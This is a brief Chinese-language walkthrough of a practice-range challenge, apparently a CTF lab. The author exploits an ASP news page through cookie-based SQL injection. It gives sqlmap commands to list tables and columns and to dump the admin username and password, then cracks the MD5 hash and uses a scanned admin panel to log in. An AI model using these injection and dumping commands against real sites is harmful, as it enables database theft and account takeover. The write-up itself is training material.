sqlmap
靶场第二题:https://hack.zkaq.org/?a=battle&f=target&id=31ac789a52edf9bb
首先我们尝试下sql注入
http://120.203.13.75:8001/shownews.asp?id=171%20and%201=1
说明该网站有防sql注入。那么我们使用cookie注入
http://120.203.13.75:8001/shownews.asp?id=171%20order%20by%2010
第一步
猜解表
sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --table --level 2
第二步,猜字段
sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --column -T admin --level 2
第三步,爆数据
sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --dump -T admin -C "username,password" --level 2
b9a2a2b5dffb918c,该密码是md5加密,百度搜索md5在线加密
我们已经拿到密码了
进入后台网站,利用御剑工作扫出后台
http://120.203.13.75:8001/admin
输入账号admin,密码welcome获取flag